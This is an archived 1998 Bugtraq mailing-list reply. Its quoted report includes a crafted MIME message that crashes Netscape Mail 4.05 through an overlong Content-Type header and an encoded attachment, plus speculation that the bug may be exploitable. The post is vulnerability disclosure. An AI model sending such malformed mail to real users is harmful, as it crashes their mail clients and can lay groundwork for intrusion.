Bugtraq mailing list archives

Re: netscape mail overflow(another one)

From: brett () LARIAT ORG (Brett Glass)
Date: Tue, 28 Jul 1998 23:49:04 -0600


It makes perfect sense that any header field could overflow a limited buffer.
I'd assumed that developers would have the sense to check ALL of the buffers
used to store headers, but maybe this should be pointed out to them, just to
make sure.

We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers
as well. I'm sure they're there given the overall low quality of the code
that these companies are generating (sigh).

--Brett Glass

At 08:21 PM 7/28/98 +0200, Paul Boehm wrote:

Hi,
netscape mail crashes when trying to the attachment
from the following pseudo mime mail:

From: Paul Boehm <paul () boehm org>
To: paul () boehm org
Subject: test
Mime-Version: 1.0
Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
--ABC123
Content-Type: text/plain; charset=us-ascii

test123

--ABC123
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AA"

H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
AADwvx2CTC7aACgAAA==

--ABC--

i suppose this is exploitable, but i don't really know.
i only tested this with win95 netscape 4.05.

bye,
   paul

--

[ Paul S. Boehm | paul () boehm priv at | http://paul.boehm.org/ | infected@irc ]

Money is what gives a programmer his resources. It's an exchange system created
by human beings. It surrounds us. Works for us, binds the economy together.

Current thread:

Re: Fwd: Any user can panic OpenBSD machine Jason Thorpe (Jul 27)
- <Possible follow-ups>
- Re: Fwd: Any user can panic OpenBSD machine Michael Graff (Jul 27)
  - Re: Fwd: Any user can panic OpenBSD machine Todd C. Miller (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Warner Losh (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine J.R. Valverde (Jul 28)
    - Re: Fwd: Any user can panic OpenBSD machine Felix Schroeter (Jul 28)
    - netscape mail overflow(another one) Paul Boehm (Jul 28)
    - Re: netscape mail overflow(another one) Brett Glass (Jul 28)
    - Re: netscape mail overflow(another one) pedward () WEBCOM COM (Jul 29)
    - HP-UX Predictive & Netscape SSL Vulnerabilities Aleph One (Jul 29)
    - Long attachment filename exploits: a procmail filter John D. Hardin (Jul 29)
    - Crash a redhat 5.1 linux box Zachary Amsden (Jul 29)
    - FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux box) Joe Zbiciak (Jul 29)
    - Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Roger Espel Llima (Jul 30)
    - Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Alan Cox (Jul 30)
    - Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Pavel Kankovsky (Jul 30)
    - Re: netscape mail overflow(another one) Paul Boehm (Jul 29)
    - who Paul Boehm (Jul 28)

(Thread continues...)